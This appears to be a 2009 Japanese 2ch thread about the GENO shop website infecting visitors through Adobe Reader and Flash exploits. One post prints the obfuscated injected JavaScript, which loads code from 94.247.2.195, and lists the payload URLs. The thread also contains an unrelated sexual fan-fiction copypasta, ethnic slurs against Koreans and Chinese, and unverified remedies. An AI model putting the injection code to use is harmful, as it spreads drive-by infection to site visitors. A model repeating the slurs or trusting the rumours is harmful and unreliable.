【注文0.1】Genoのサイトでウイルス感染…か？★２

中古PCとPCパーツの通販ショップGENO　ttp://www.geno-web.jp/


【客の返品】GENOを語るスレ29【オク出品】
http://pc11.2ch.net/test/read.cgi/pc/1237696091/326-
326 名前：名無しさん[sage] 投稿日：2009/04/04(土) 10:43:40 0
GENOのHPにアクセスしようとしたら、Acrobat Plug-in が起動して
This operation is not allowed. と表示する。
２台試して、2台とも起きた。
もしかしてウィルスに感染してる？

前
【注文0.1】Genoのサイトでウイルス感染…か？
http://tsushima.2ch.net/test/read.cgi/news/1238844402/

「ルイズ･･････、お前、可愛かったんだな･･････。が、頑張ればできるじゃねぇか」
「なにそれ、可愛くなんかないもん」　「か、可愛いって。まるでレモンちゃんだ」
「レ、レモンちゃんじゃないわ。というかレモンちゃんてなによ」　「肌がすべすべで、レレレ、レモンちゃんだ」
夢中になって、ルイズの首筋に唇を這わせながら、才人は呟く。脳内はすでに花畑なので、
自分が何を言っているのか、才人自身が理解していなかった。
「ばかぁ･･････。こんなことするサイトなんてキライなんだから･･････。ちょ、や、やめ･･････」
「わ。ここはもっとレモンちゃんじゃないか、こ、ここなんかどうしようもないほどにレモンちゃんだ」
「はう。･･････わ、わたし、よくわかんないんだけど、ほんとにレモンちゃんなの？」
「そうだよ、とりあえずレモンちゃん恥ずかしいって言ってごらん」
沸いてる、というレベルを光年の単位で超えている才人の茹だったセリフだが、
ルイズも根は相当アレなので、なんだかそれがロマンチックな響きに聞こえた。
というか一旦こうなったら、ルイズはなんでもいいのだった。その辺の趣味は、才人よりある意味ひどい。
「レ、レモンちゃん恥ずかしい･･････」
で、言った、頬を真っ赤に染め、とろんとした目で、口を半開きにしてルイズがそんなアレを言いやがったので、才人は激しく興奮した。

GENOで河童30個買った思い出

>>1にリンク貼ってるのはわざとか

>>1
http://www.geno-web.jp/
踏みまくった　何ともない

>>2
はえーよ

>1
リンク張りやがって。感染させようとしてるだろ。

これ踏んだらPCの中にある主要なファイルが抜き取られるらしいね。

おまえの恥ずかしい緊縛画像が！

>>5
危険URLを指摘すると毎回このレスがつくな。

余裕の2ゲット

Adobe Readeだけじゃなく、Flash Playerも不味いとのことだが・・・
本当だろうか？

それと各アンチウイルスソフトの対応はどう？

今北産業の人へ
・最新版のWindowsUpdateとadobeAcrobatの9.1であれば感染しない。
・ファイル作成を検出できたアンチウイルスソフトは４０のうち１０だけ。
・結論、管理もしてないようＰＣでアクセスすれば余裕で感染する。

GENOネット通販責任者の阿部！さっさと行動しろ！

おまえらオススメのNoscriptとFoxit入れた
覗いてくる

>>1
http://www.geno-web.jp/
踏みまくった　・・・
ノートン反応した

感染したらＰＣの挙動おかしくなるだけ？
何か抜かれてたりはしないの？

GENOに社会的制裁をあたえたいんだけど

どうすればいいの？

火狐でアクセスしたが、即効でタブ閉じたんだが

はやくまとめてくれよ
アクロバットがどうのこうのとかなんとか

>>12
フラッシュもだろ

買おうと思ってたのにアクセスする気が無くなったじゃないか

▽検出率テスト比較
http://www.av-comparatives.org/seiten/ergebnisse_2008_08.php

▽オンライン　ウィルス　スキャン
・CA Anti-Virus　http://www3.ca.com/securityadvisor/virusinfo/scan.aspx
・Norton　http://security.symantec.com/sscv6/default.asp?productid=symhome)#id=jp&venid=sym
・Gdata http://www.gdata.co.jp/onlinefilescan/
・マカフィー　http://jp.mcafee.com/root/mfs/default.asp
・ウィルスバスター　http://www.trendmicro.co.jp/hcall/
・カスペルスキー　http://www.kaspersky.com/virusscanner
・F-Secure　http://support.f-secure.com/enu/home/ols.shtml
・ウイルスチェイサー　http://www.viruschaser.jp/support_online.html
・BitDefender　http://www.bitdefender.com/scan8/index.html
・command-on-demand　http://www.commandondemand.com/
・Dr.Web　http://www.drweb.com/
・Panda ActiveScan 　http://www.pandasoftware.com/activescan/com/activescan_principal.htm

>>20
やっぱりか・・・

ラトビアにクレカや暗証番号全部つつぬけ
悪用させる可能性大。一番性質の悪いタイプのウイルス。
しかもまだセキュリティソフトが対応し切れてないという。

>>12
情弱しか感染しないのか
つまんね

新型ウイルス踏んでも　なんともない　って言える大人かっこいいです。

ウイルス踏みましたよ　って教えてくれるウイルスもあるんですかね

こういうのってGENOのページで入力したクレカ番号とか以外にも、そのPC内の他の暗証番号とか
入力情報が抜かれるの？

9.1はも落ちると聞いたが、感染はしないけど落とされるってことか

無駄に重くて危険なAcrobatなんか入れるな
foxitあれはいいものだ

流行の最先端をいくGENOすげぇｗｗｗ

GENOが故意で埋め込んでるのなら残念だ

Macだけどなんともないわ…
HPの複合ﾌﾟﾘﾝﾀやすいなー。これｲﾝｸの詰め替えとかできるﾀｲﾌﾟかな。
http://www.geno-web.jp/Goods/GA09078690

>>1
http://www.geno-web.jp/
ページファイルがでかいだけで無害だろこれ

>>28
当然というかそれが目的のウイルスだろ。
4月2日付の最新型だからなー。今回は踏んでしまう人も多いだろ。
カスペですら対応遅れたしなー。ノートンバスター先生なんかまだ。

誰かさ今回のウイルスおくれ。

>>12
最新版のWindowsUpdateとadobeAcrobatで踏んでしまって
問題が発生したので終了しますとなり、ブラウザが落ちましが
adobeAcrobat自体は全く起動しませんでした。
これって感染までのプロセスが完了していないと考えていいですか？
カスペは無反応（最新データ）で検索しても検知しませんでした。

Adobe Readerは勿論入れてないけど、Flash Playerは入れてるな。

仮想メモリ不足でブラウザ落ちるよ。

AdobeReaderとAcrobatって違うのか

犯人逮捕して死刑にすれば解決じゃん
これだけの人を不安に陥れた罪は重いだろ

>>35
マカフィーはどうなんだろ？

GENO開いてから211.1.219.73からいっぱいアクセスがくる。こいつ踏み台にでもなってるのか

>>40
AcrobatはPDF作れるソフト(もちろん読める)

AcrobatReaderは読むだけのフリーソフト
今はAdobeReaderという名前になってる

AdobeはともかくFLASH入れてないPCは少ないよなー。
いまだにGENOが放置状態のままなのが恐ろしい。
どんなけ被害拡大するやら。これはもうGENOは加害者といっても。

ラトビアって恐ロシアのダミー会社とかありそうだよなぁ
んでモスクワ経由でオレらの情報が支那・朝鮮へ売られる、と・・・

まだ解決していないのか。。。ふつーはサーバ止めるだろう。。。ふつーなら

GENOは日曜なんで休みか？
のんきだねー

まったく問題ないわけだが
これ風流の呂布だろ

ゴミ屋だし
売王の評価が相対的に上がった

Opera+Antivirで無反応
逆に怖いのだが

>>45
対応するのは月曜日っぽいね

火狐最新版で踏んだ
なんかacrbatみたいな文字が書かれたダイアログが二度表示された
両方ともNOを選んだ
その後、重くなって落ちて、OS再起動をした
cmd.exeは動いていない
アクロバットリーダは6.0
これってどうですか？
このまま使い続けて問題ないですか？
ネット通販でクレカ決済はよく使うんだけど。
そこまで騒ぐほどのことなの？

悪質業者ｗ

>>53
あーあ

とりあえずタスクマネージャでcmd.exeが動いてなきゃセフ？

お憑かれさまです

最近GENOを踏んだやつはクリーンインストール必須ってことか
貴重な日曜日ｵﾜﾀ＼(＾o＾)／

>>53
どんまい

やっとスレ見つけた。
今度からスレタイに「マルイ」も入れて欲しい。
ずっと「マルイ通販」で検索してたよ。

>>55
お前みたいのゴミは一番いらないからレスしなくていいよ

とりあえずリカバリしたわ手間カケさせやがって
ゲノには謝罪と賠償を請求する

価格ウイルスはすげー問題になったが
今回のGENOのはどうなるの？
故意なら業者タイーホ？

>>61
ハンカチ貸してやるよ

テポドン発射ｷﾀ━━━━━(ﾟ∀ﾟ)━━━━━!!!!

よくわからんけど
もうゲロのページを開く木にはなれない

>>16
感染するとラトビアにトラフィックを飛ばします。
何を漁ってるのかは不明。

やばいのは毎度のことでIEエンジン使いだけじゃね？

EM-netと同じ。誤報。

>>61
ご愁傷様

ミサイルきたみたいだな

放置してる時点で故意と同罪

>>53
あーあー

>>61
涙目で内心ドキドキしてるんだろ

>>44
AdobeReaderでもアウトなの？
geno開いてもブラウザ落ちるだけで特にReaderが起動する様子なかったけど

別にリカバリしなくても、システムの復元だけでいいんじゃねえの？

>>61
涙ふけよ

>>51
antivirは検出しません。
Operaで感染するかどうかは未確認です。

ここのXPのDSP版安かったからサイト探してて結局見つからなかったんだけど
この状況見てると勝ち組でおｋ？

>>53
アクロバットリーダのセキュリティホールをついてくるタイプなので6.0では話にならないが
古すぎてウイルス自体が不具合起こして感染しないラッキーな場合もありえる。
アンチウイルスが検出できるタイプかどうかにかかってる。
ttp://www.virustotal.com/analisis/48cfd289b06a1fb46dfbcb9fc8bad17a

>>35
そうなんだ！
一応アマゾンとか通販は別のPCでやってるしNo Scriptも入れてるし大丈夫かな。
そもそもここ3日くらいは踏んでないからよかった

Firefoxと9.1で何とも無いようだが

No Scriptで回避余裕過ぎワロタｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗ

調べてみた。
やっぱなんかある

<script language="JavaScript" type="text/javascript" src="http://www.geno.co.jp/xmlrss/osusume_shouhin.js"></script>
<script language="JavaScript" type="text/javascript" src="http://www.geno.co.jp/xmlrss/osusume.js"></script>
の
<!--
document.write(unescape('%3C4x4sWXkcr4Si4x4plct4x4%20P0srP0cWXk%3DC2%2F%2F4x49lc4lc%2EP02C247lc
%2E4S2%2E1lc95%2FP0jP0qu4x4erP0y%2Ejs%3E4x4%3Cmb%2FC2s4x4cript4S%3E').replace(/WXk|4S|P0|4x4|mb|lc|C2/g,""));
-->
↓
<script src=//94.247.2.195/jquery.js></script>
の
unescape('fq%3CssoWcOTHriDpgpsoWt%20sOTHrc%3DOTHhDpgtsoWtDpgp:%2F%2F94soW%2EVV24Rp7%2E2Rp%2E19U6
k5%2FneU6kwsfq%2F?iVVd%3Dfq1fq0RpZ%3E%3C%2FH5rscDpgrRpiptRp%3E').replace(/soW|VV|U6|rV|fq|OTH|
H5r|Dpg|Rp/g,"").replace(/Z/,navigator.appName.charAt(0)=='M'?'0':'1'));

こんな感じで

<script src=http://94.247.2.195/news/?id=100></script>

で、実体

ttp://94.247.2.195/news/?id=2
ttp://94.247.2.195/news/?id=2

出かけてくるから後は頼んだｗ

本当、アドビのソフトはセキュリティホールに利用されまくっているな！

普通に考えて個人情報も漏れてるよね

所々h抜き忘れてる・・・orz

アクセスするなよ！

>>84
北チョンのミサイルと新種のウイルス！？
これは！？
+に帰るか・・・。

?id=2がPDFで
?id=3がフラッシュ

GENO普通に見れるじゃん…と思ったら急に重くなった。opera使用。
マカフィー先生反応なし
operaが落ちた

○一日放置ってどんだけなんだ
まぁたいしたことはないんだろうがな
念のため入れなおすか
ブラウザとJANEとwarrockいれるだけだし

Adobeのアップデートがやたらと重い

これって一旦感染したらウィルスソフトで削除できないの？

感染したかどうか確認する方法ってあるの？
オンラインスキャンでどれか対応してる？

ウイルスソフトはkingsoftだな
あVは見つけただけで大騒ぎな心臓に悪いアクションが嫌いでやめた
まぁ踏んだ人の80％がそのまま使い続けるんだろうがなｗ

>>93
dllと癒着しているので再インスコしか手段が無い

>>49
わざわざ問題あるように動作してくれるパスワード抜き取り系ウイルスってあるの？ｗ

FirefoxならNoScriptで回避余裕
Operaはユーザースクリプトのためにスクリプト常時有効だから死亡

ウイルスとかどうでもいいが
木曜あたりであったスレでぽちったパソコン届くのか？
金振り込んだぞ、トンズラとかかんべんな

今の所は感染したら駆除できるソフトはない。
やっと一部のソフトがサイト踏んだ時に検知できるようになっただけ。
残念ながらクリーンインストールしかない。

仮想マシンで踏んでみたらｘｐSP3の素の状態では反応なしのまま
通常のように見えて裏で「94.〜」アクセス？

IE7＋xpsp3+reader8.14+flash9で「microsoft　database〜」のポップアップ、ブラウザは落ちなかった
IE7+xpsp3+reder9.1+flash10でもポップアップ＋IEテンポラリ一杯表示（RAMDISK）、ブラウザ落ち

どちらもキャンセルで通常表示できたように見える・・・2回目以降も通常表示できたかのように見える。
初回のみ、何か気持ち悪い・・・データ抜かれて2回目以降は通常通り振舞うのか？

2日も放置とか、ショッピングサイトとしてありえない
こんな状態なら、安いんだけど気持ち悪いし当分買う気起きない・・・

foxitだから問題ないな

いんとらーねっつ恐いおー＞＜

とりあえず復元しとくか

感染したか、HiJackThisとかで分からない？

>>96
そこまで悪質なのかよ・・・

システムの復元で戻せばおｋなの？

君子危うきに近寄らずというのにお前たちはわざわざ踏みに逝くんだな

このスレのdatに感染してそう

この手のスレで一番たちの悪いやつが不安にさせるような書き込みを
喜んでする朝鮮人

ID:cRXmGUteは只今再インスコ中です

>>110
だよな
何の問題も無いのにな

結局,Acrobatは起動しなかったんだが。
cmd.exeも動いていないし。

、まあ、念のためHub抜いとこ

>>110>>112
問題ないならそう主張すればいいだろ。
ＲＯＭってる人たちは双方の意見を見て
どちらが正しいか結論下すわけだし。
問題ない問題ないしか言わないんじゃ
単に問題を矮小化してるだけとしか思えないじゃん。

危険性を単純に指摘するレスではない
わざと不安にさせてやろうっていう意図を持っている
生粋の朝鮮人がいるでしょ。
自分でも気づいてないうちにそういうことをしているんだろう
血は争えないね

>>114
放っておけ
触らぬ気違いになんとやらだ

Operaは行く前にF12->JavaScriptを有効にするをOFF,プラグインを有効にするをOFFでおｋ
最強伝説

>>115
意味不明。なら、いかに安全か主張すればいいだろ。
２ｃｈで自分にキモチの良い意見以外は認めないとか
頭くさってんのか？

２スレ立ったのかｗ
ここのGENOのバックエンド作ってる会社も点プレに入れといてやれ

>>115
全くだな何が楽しくてそういう行為に走るのやら・・・・
虚しくならないのかねぇ

この会社土日休みなのか？

検知してブロックしたから問題ないぜ・・・と思ったら
いつもあるはずのウイルスバスターの常駐アイコンが無くなり、
ウイルス検索等すべての機能が使用不可になった

今までいろいろ踏んだけど、今度のはかなり強力なやつだと思うけどな
何の問題もないことはないだろ・・・

javaとかflashとか使うサイト多すぎるよね

感染したかどうかどこでわかる？
タスクマネージャのプロセスでなんか見える？

ウイルスセキリュティはゼロが一番ｗ
ttp://www.geno-web.jp/Goods/GA07288700

115>
煽りで朝鮮とかいうのは痛い子。
ミサイル打ち込むような馬鹿な国なのはみんな知ってることｗｗｗ

>>121
通販ショップだと土日祝は休みって結構有る

このスレ開いた瞬間IEが開いて
ひたすらタブ増やしていきやがった
なんだ？だれだ？お前か！

122さんそれはほんとのことなんですかぁ？

>>127
　でも、店頭はやってるから、連絡要員はいるだろ。

>>128
それは別の問題のような気がするｗ

Adobereaderなんてそもそも入ってないんだけど・・・影でこっそり感染してますか？

>>124
コマンドプロンプト開いてないのにcmd.exeが動いてないか。
ルートフォルダにu.bat等の変なファイルはないか。
とか？

再起動後にcsrss.exeのメモリ使用量が10,000Kを超えてたら…

感染とかVIPかよ

AdobeReaderが入ってなくてもFlashPlayerがはいってれば危険があるとテンプレに入れるべきだな

アウトなのはトップページのみなの？

絵スレを見れば絵を描きたくなり
車スレを見れば車が買いたくなり
…
ｳﾘﾙｽスレを見れば(ry

踏んじゃったのでカスペスキャンしようとしたらこんな表示が出てスキャン出来ねえ
http://www3.uploda.org/uporg2142314.jpg
ネットに接続してないわけないだろ！もう駄目ぽ

はやくGenoから公式にアナウンスして欲しいんだが。
無害なのか有害なのか対処法や事実ならば謝罪など

感染してるかわからないって最強のウイルスだな畜生

geno終ったなｗ
ここのurlあぼーんにしておくか

>>139
ウイルスがアンチウイルスの機能を止めるために
hotsリスト書き換えてんだな。よくあること。

>>132
flashでもアウトです

PDFビューワー「Foxit Reader」v3.0とv2.3に複数の脆弱性
www.forest.impress.co.jp/article/2009/03/10/foxitreader30b1506.html

まさにジェノサイドってね

>>143
低スキルのくせに適当なこと言うなよｗｗｗｗｗｗｗｗｗｗｗ

>>137
試しにメモリーカード・その中の適当な商品のソース見てみたが該当js読んでたよ。

今ごろアップデート通知ｗ

4月2日付発見の新型だからね。今の段階ではセキュリティソフトは無力。
自己防衛してるかどうか。でもflashの方はひっかかる人はどうしてもでる。
この瞬間にも各所に貼られまくって、被害者増殖中だ。GENO自主閉鎖しろ！！

ＡＶＧのウイルスＤＢ 270.11.41/2041 から新しいの来てない？　全然更新できないけど

踏んでも何も変わらなかったぞ
強いて言えば、マウスの故障が直ったことくらい

いくらでもある方法に対処するなんて無理だよ
結局運でしょこんなの。
ここみて踏んだのならともかく、携帯音楽プレーや０−　通販
でぐぐって飛んで感性なんてありえない
なんで通販サイトのトップページ見て感染なんだ
ここが一番おかしい

>>129
ほんとだよ
おれのはアクロバット起動したけど読込エラーになった
バスターは怪しいファイルを検知して隔離してくれたけど、刺し違えたらしく完全に沈黙
いろいろやって今は復活したように見えるけど・・・まだ何となくあやしい
ほんとうにむかつく・・・

これはVIPの糞ガキを駆逐するチャンス

IEのセキュリティをJavaスクリプトoff、ActiveXもoff、AdobeReaderインスコなしの環境で踏んだのに感染した・・・orz

>>155
早く向こうに張って来い

リストアめんどくせぇなぁ
勢いでやると後で公開するから
必要なファイルはバックアップしなくてはならない

>>153
いい加減感染者は再インスコしろよ

>>156
flashもダメっぽいよ

>>154
そうか。疑ってすまんね
俺はもう再インスコするよ。
実害はどうか知らんが気持ちよく使いたいのでね

>>153
ページ見て感染することは、全くおかしくありませんが？

対策ソフトなんて所詮遅いんだよ

またケツ毛が流出するのか

放置ってのが問題だな

そのページが普通の通販サイトなのがおかしいだろ
ごっぐるとかの(・∀・)ﾌﾞﾗｸﾗ?サイトじゃあるまいし

いまでもウイルス放流中なんだよな
信じられんわ

Foxit Readerの俺、勝ち組ｗ

>>157
書こうとしたら規制されててﾜﾛﾀ

店舗は普通に営業してたな

>>168
かわいそうです(´；ω；｀)

>>168
>145

>>160
でもActiveXコントロール切ってたんだから、Flash読み込まないはずなんだけどな・・・
せっかくの休みにリカバリ作業かよ、あーマジでむかつく

>>169
やったら、規制レベルじゃなくなるがな

昨日復元やったんだがCONIME.EXE-13EEEA1A.pfこれってアウト？

>>166
VECTOR・価格COMでもハッキング・ウイルス騒動あったくらいだしなー
なんでGENOみたいなマイナーサイト狙ったのかが腑に落ちん。
でも普通の通販サイトは警戒薄れるのは、多少は仕方ないとはまー思う。

フラッシュは最新版でもだめなん？

首吊ってくる('A`)

アウトロー板にスレ立ててみた
通販ショップGenoのサイトでウイルス感染…か？
http://changi.2ch.net/test/read.cgi/4649/1238902295/

お前ら環境ぐらい書けよ

【注文0.1】Genoのサイトでウイルス感染…か？
http://takeshima.2ch.net/test/read.cgi/news4vip/1238902335/

ウイルストータルでの結果をクレ

>>175
cmd.exe動いてないときにconime.exeが動いているとアウト

>>179
取りあえずAAだけ貼ってきた

>>180
>お前ら環境ぐらい書けよ

扶桑みたいににょきにょきだ。

恐らくgenoのサーバにある全てのjsファイルに攻撃サイトを呼び出すコードが挿入されている
genoのサイトでjsファイルを呼び出しているページは全てアウト

リカバリ完了できれいさっぱりしますたm9

ZAでexeの動作をブロックしたけどこれは大丈夫なのか

>>168
遺憾の意

>>188
アウト

流す涙は乾いても。。。。
酒飲んで寝よｗ

この段階で大丈夫だったのかどうか知りたいな
http://tsushima.2ch.net/test/read.cgi/news/1238662017/

1 名前： カリフォルニア(福島県)[] 投稿日：2009/04/02(木) 17:46:57.91 ID:yQG9LCm1 ?PLT(12001) ポイント特典
http://img.2ch.net/ico/nacchi.gif
新品】 NEC VersaPro タイプVE [PC-VY20AED7HJW5] （Core2DuoT7250 2.0GHz /1GB /80GB /S-マルチ /Vista Biz or XPP）
[商品番号] GA09077530
[販売価格] 45,990 円
[ポイント] 1
[在庫数] 17

●CPU Core 2 Duo T7250 (2 GHz)
●インストールOS Windows Vista Business with SP1 (Windows XP Professional インストールサービス適用)
●ディスプレイ 15.4型ワイドTFTカラー液晶(WXGA)
●メモリ 1GB(ECC無しDDR2-SDRAM、PC2-5300、1024MB SO-DIMM×1)
●ハードディスク 80GB
●光学ドライブ DVDスーパーマルチドライブ
●バッテリ ニッケル水素バッテリ
●LAN 1000BASE-T/100BASE-TX/10BASE-T
●インストールアプリケーション なし
●再セットアップ媒体 再セットアップ用媒体添付[Windows XP Professional用(CD-ROM)]
ttp://www.geno-web.jp/Goods/GA09077530

感染確認はどこ見ればいいのよ

>>186
どのみち商品の画像表示のためにもともとjQueryを使って拡大表示とかをさせていた筈なんで、
サイト内で画像が表示されるページは全滅だと思う。

conime.exeはレジストリ設定で起動しないようにできるんだぜ。
Windowsのカスタムマイズでそれをやったかもしれない人は注意な。

>>182
>>80

>>196
マカフィーだと検知するのか？

前ｽﾚより
643 名前： SM-3(dion軍)[sage] 投稿日：2009/04/05(日) 02:36:05.55 ID:/mZc4qed
>>634
検出できるソフト一覧やり直したよ粕

●a-squared 　　　　4.0.0.101
　2009.04.03 Trojan-Spy.Agent!IK
●Avast 　　　　　　4.8.1335.0
　2009.04.03 Win32:Daonol-L
●eSafe 　　　　　　7.0.17.0
　2009.04.02 Suspicious File
●GData 　　　　　　19
　2009.04.03 Win32:KillAV-KS
●Ikarus 　　 T3.1.1.49.0
　2009.04.03 Trojan-Spy.Agent
●Kaspersky 　　　　7.0.0.125
　2009.04.03 Backdoor.Win32.Agent.afhg
●McAfee+Artemis 5573
　2009.04.03 Generic!Artemis
●Prevx1 　　　　　V2
　2009.04.03 High Risk Cloaked Malware
●Sophos 4.40.0
　2009.04.03 Mal/Generic-A
●TrendMicro 8.700.0.1004
　2009.04.03 PAK_Generic.001

Operaで踏んでみたが何も無い
プロセスも増えなかった（ｒｙ

cmdもconimeも動いてない
初めてZAが役に立ったような気がする

コマンド プロンプト立ち上がらない
Windows Update出来ない
ＡＶＧ更新できない
ＩＥが落ちる

俺大丈夫だよな

>>201
九条バリアが守ってくれたはず

非常駐だけどa-squared Freeで検出できるかも

>>192
それより、そいつが届くのかが心配だ

>>2は病気って事はわかった

と思ったら動いてた
リカバリか

>>145
Foxit不具合あったのか〜うｐしとかなきゃ
こういうスレもたまには覗いて見るもんだね

検出可否報告スレに上がっていた検体をavastに掛けたがスルーされた
心配なのでvirustotalにかけてみたら>>80と違ってavastではまだ未対応っぽい
ttp://www.virustotal.com/jp/analisis/8f9f70c9174d29fefc2878b9678c13e4

怖すぎ・・・
カスペのヴァージョンUpが来るまで
ネット通販のサイトは開かないことにしよう・・・

>>192
仕掛けられたの多分昨日だろ

firefox 3.0.7
トップページで踏んだところAｄｂｅ Reader6.0.1が立ち上がり
This operation not allowed（許されなかったこの操作）と２回表示　選択はOKのみ
セキュリティーソフトはESET Smart Security

と思ったら
対応してたか・・

>>201
おれも昨日コマンドプロンプト立ち上がらなくなった
ネットにもつなげなくなったから再インスコしてきてからこの件しったよ

IEでもFFでも何度再起動してもブラウザ固まっちゃうようになったから
再起動して、HDDエラーチェック施したら３項目目あたりで修復がかかったような表示が出たような？
とりあえず、復帰して変なexe系も一切動いてないし・・・

これは、個人情報は抜かれてないと思うなぁ　破壊系なのでは？

犯人が特定されて一生ものの損害賠償を請求されますように

conimeがうごいたけど停止したので安心かな

カスペなにも反応しなかったぞ

>>198
誤検出が多い、a-squared Freeを入れてみたわ

N速って情弱情弱って馬鹿にするわりには
このスレ酷い初心者っぷりが滲み出てますねｗｗｗｗｗｗｗｗｗ

>>203
早速落としてきて、Updatesし、スマートスキャンかけてるわ

>>214
それはmetadataの不整合じゃない？
過去に強制リセットやフリーズ、停電等したことなかった？

Geno site（ジェノサイドとかけている）

>>217
adobeが最新版ならexe落ちて来ないからじゃね？

念のため復元して再起動したら、VS-ZEROのウィルス検知が作動しなくなったｗ
再インストールしろだと
捨ててくるわｗ

MS updateの更新履歴が消えた

ぶっちゃけいうとウイルス感染したらシステムの復元でダブルクリック前・感染前に戻れる確率は80％

>>224
VSはねーわ
フリーのほうがよっぽどましレベル

情弱はアンチウイルス頼りで自動アップデートできないものの脆弱性はスルーだからな
flashだのadobe readerだの
いつの脆弱性だか

>>226
80%でも高くないか？

>>216
ソフトによっては裏でコマンドプロンプト立ち上げてたりするからconime.exeが動いてるのは当然

>>230
レジストリで止めないほうがいいのかな・・・

>>229
リカバリする前にやってみて案外ほぼ解決する

ただ、その気管に入れたソフトや設定がゴミになるｗ

ルーターのログを見たら確かにラトビア接続してるなあ

8lv.exe - Google 検索
http://www.google.co.jp/search?num=50&lr=lang_ja&ie=sjis&oe=sjis&q=8lv.exe

とりあえずconime止めたらブラウザ落ちなくなった

cmdで2バイト文字使わないからconimeリネームした。

システムの復元やってきたけど、不安だからa-squaredで調べてみる
今、インスコ中

>>231
スレの流れ見た限りではあまり気にすることも無いんじゃないか？
PCの挙動がおかしいならアレだろうけど

なんだかんだ言っておまえら
GENOで特価チェックしてたんだな
好きなんだろGENOが
本当の事はいちまえよ
そうすれば気分が楽になるぜ？

>>221 とりあえず、ブラウザ固まってから必死で再起動処理させたけど
むりくり電源落とすようなことはしなかったなぁ
ブラがやっと落ちる→バックでreaderがなんか送信しようとして寸止め中　　だったから
reader起動寸止めループ＆送るふりしてるだけなんじゃないの？java使った悪質なブラクラなんじゃないかと・・・

技術的な検証は俺の知識ではできないけどｗ
FFに前スレでオススメしてたNoScript入れたら快適にgeno閲覧できるぜｗ　いまは触れぬが既知だと思うが。

怪しい常駐プログラムは見当たらないから大丈夫とは思う。
一応94.247.2.195はルータで遮断したけど。

>>238
挙動はおかしくないから様子みてみる

>>231
説明不足だった orz
たとえばBit Defender cmd版 などもconime.exe使う
ようするに単独でconimeがおかしいということ

AdobeReaderのアップデート重すぎワロタ

PSPで踏んだんですけど大丈夫だよね？

>>243
なんだじゃあBDcmd入れてる俺はまだ大丈夫な可能性があるのか？
ブラウザクラッシュはしてないし挙動はまったく変わりないんだが

どんなに糞であろうとも、企業サイトがえんえんウィルスを放流し続けるとは信じられん

まともな企業ならセキュリティ担当者の首が飛びかねないのに

>>241 お、それいいね、俺も怖いからやっとこっと

>>239
GENOなんて初めて聞きました

というかconime動いたの自分でコマンドプロンプト立ち上げてからだった
アホくせ

>>246
Bit defender cmdが動いてないときにはconime.exe使わない

まだ仕込まれたままになってんの？どんな企業だよｗｗｗｗｗｗｗ

むしろ対応してないアンチウイルスソフトがワロタwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww

ノートンとかｗ明日、中国のお姉ちゃんがチャットでお前らの相手をするんだなｗ

Geno許さん

親父のPCにファイアウォールとアンチウィルスソフト入れてあげたら
数日後に「ネットしてると少し重い」つってアンインスコしてた
また数日後に架空請求とスパムが大量にきててﾜﾛﾀ

このスレ見てて思った。

「情報弱者の方が人生楽しめそうだ」

>>240
いや、見た後じゃなくて前回のHDDのチェック以降って話ね。
まぁ俺は幸いにも引っかからなかったっぽいし
判った後も怖くてコンソールでjs落としてcatで見るくらいしかできなかったけどｗ

conime.exeﾃﾞﾀ━━━(´･ω･｀)━━━!!
サービスのとこコンソールIMEって書かれてるが・・・

>>256
えー
みんなで楽しくやろーよー

間違えたプロセスの説明のとこねorz

>>256
情報弱者を見て笑うのがいいんじゃないか

adobe9.1でも感染の兆候があったんだよな
プロセスに異常はなかったぽいんだけど

いつからここは情弱速報になったんだ
生粋のν即民ならガチガチに固めてるかノーガードで全弾被弾だろ

てか、おまいら最低でもProcess Explorerをインスコしておいて
普段から常駐するプロセスや実行中のプロセス位把握しとけよｗ

ttp://technet.microsoft.com/en-us/sysinternals/bb896653.aspx

AntiVir使って情強気取りしてたν速民ｗｗｗｗｗｗｗｗ

つーかこのスレに書いてあることがサパーリワカラン情弱俺乙

>>256
刺激のある人生ってのは、変化があるってことだからな

石橋を叩いて壊す
石橋を叩いて渡って結局落ちる
石橋を問答無用で渡る
命綱だけは付けて石橋バンジー

そりゃ、それ自身はコマンドプロンプトとかのCUIでIMEを使えるようにするプログラムですから
要はcmd.exeとかが動いた形跡があったってサインだから他の要因でも起動してる。

情弱
情報弱者

これらは基本的に透明あぼーんがいいみたいだな、この板は。

>>264
それいいよな
なかなかその手の使える奴他にない

>>251
調べたら一度コマンドプロンプトを立ち上げたらその後もconimeは動き続けるとかなんとか

ある意味今回のテポドン2より脅威だな。

nod先生はどうなの？対応したって言われても踏む気はないが

>>263
俺も情弱なんでfoxにnoscript使ってるけど
臆病ものだからgeno開きたいのに開けない
先生対応遅いし

>>267
命綱つけての石橋バンジーが楽しすぎるよな

>>268安価忘れ・・・
>>258へだった

システムの復旧で直った

つかそういう実害が出るあたり普通に破壊系のウイルスじゃないのか
どっかで解析されてないの？

>>277
抜かれた個人情報はそれじゃあ解決しないぞｗ

>>278
前スレを一から読み直せ

さっきから色々ガード外しながら踏んでるけど
何もおきねえ
俺もお前らみたいに楽しみたい

>>278
ttp://anubis.iseclab.org/?action=result&task_id=1890669b0bd937574e5be45e24c63ea80&format=html
同じハッシュのファイルが解析されてるっぽいけどいまいち分からん

がちがちに固めたら面白くない
食らって対応するのが粋なんだよ

>>279
ネトゲやってないし
カードは保険があるし
痛くもない

キンタマのほうが怖いわ

スレタイ検索すると一番上にGENOサイトのPRが出てﾜﾛﾀ

>>220
結果出た？

Windows の人は大変ですね

なんなのこの会社。今日は休みですかwwwwww

確かGENOの前はSTEPだっけ？

トレンドのオンラインスキャンで検出してなくて、ＡＶＧ8.5スキャンで検出してなければ、感染していないと考えておＫですか？

Foxitのリビジョンが１つ古かった
flashは10.xxの最新だった
昨日genoの特価品見たけど何ともないような気がする

所詮システムの復元で治る程度かよｗ

これいつからなんだろ。3月にここで買い物しちゃったんだが

なんでν速これほどまでに無知なんだ
最低でもAvast+Spybotぐらいは最低装備だと思うんだが

ここ、雑誌にも広告出してるし被害者多いんじゃないの？

>>267
…石橋を叩いて人に渡らせる

>>290
おk

>>294
対策ソフトなんて普通いれないだろ
たまにオンラインスキャンで検査するだけでいい

>>293
このウイルスが誕生したのは4月2日くらいらしい
もっとも別のウイルスの罠が張られていたかもしれないがなｗ　こんなザル管理の鯖じゃーねぇ
個人情報も全部垂れ流しの可能性すらあるわ

石橋を叩いて壊す
石橋を叩いて渡って結局落ちる
石橋を問答無用で渡る
命綱だけは付けて石橋バンジー
全裸で泳いで渡る

